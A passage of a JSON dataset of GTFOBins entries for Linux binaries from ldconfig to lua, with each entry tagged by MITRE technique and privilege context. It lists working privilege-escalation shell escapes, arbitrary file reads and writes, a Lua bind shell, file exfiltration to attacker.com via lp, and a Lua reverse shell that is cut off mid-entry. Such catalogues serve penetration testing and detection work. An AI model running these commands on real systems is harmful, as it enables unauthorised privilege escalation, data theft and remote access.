/path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ldconfig/"]},{"id":"gtfo:less:command:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"cp /path/to/command ~/.lessfilter\nless /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:command:1:sudo","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:command:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:1:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:1:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:2:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-read:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-write:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-write:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:file-write:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:inherit:0:sudo","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:inherit:0:suid","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:inherit:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:0:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:0:suid","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:1:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:2:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:lftp:shell:0:sudo","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lftp/"]},{"id":"gtfo:lftp:shell:0:suid","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lftp/"]},{"id":"gtfo:lftp:shell:0:unprivileged","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lftp/"]},{"id":"gtfo:links:file-read:0:sudo","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/links/"]},{"id":"gtfo:links:file-read:0:suid","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/links/"]},{"id":"gtfo:links:file-read:0:unprivileged","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/links/"]},{"id":"gtfo:ln:privilege-escalation:0:sudo","toolId":"gtfo:ln","toolName":"ln","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"ln -fs /bin/sh /bin/ln\nln","description":"This overrides `ln` itself with a symlink to a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `ln` by path. Warning, this is a destructive action.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ln/"]},{"id":"gtfo:loginctl:shell:0:sudo","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/loginctl/"]},{"id":"gtfo:loginctl:shell:0:unprivileged","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/loginctl/"]},{"id":"gtfo:logrotate:file-read:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-read:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-read:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-write:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-write:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-write:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:shell:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/path/to/temp-file.config {\\nmail x@x.x\\n}' >/path/to/temp-file.config\necho '/bin/sh 0<&2 1>&2' >/path/to/temp-file.sh\nlogrotate -m /path/to/temp-file.sh -f /path/to/temp-file","description":"This command is picky about file permissions. An existing config file can be used as weel, provided that it contains a mail directive.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logsave:shell:0:sudo","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logsave/"]},{"id":"gtfo:logsave:shell:0:suid","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logsave/"]},{"id":"gtfo:logsave:shell:0:unprivileged","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logsave/"]},{"id":"gtfo:look:file-read:0:sudo","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/look/"]},{"id":"gtfo:look:file-read:0:suid","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/look/"]},{"id":"gtfo:look:file-read:0:unprivileged","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/look/"]},{"id":"gtfo:lp:upload:0:sudo","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lp/"]},{"id":"gtfo:lp:upload:0:suid","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lp/"]},{"id":"gtfo:lp:upload:0:unprivileged","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lp/"]},{"id":"gtfo:ltrace:file-read:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-read:0:suid","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-read:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-write:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-write:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:shell:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:shell:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:lua:bind-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:bind-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:bind-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:download:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:download:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:download:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-read:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-read:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-read:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-write:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-write:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-write:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:reverse-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n 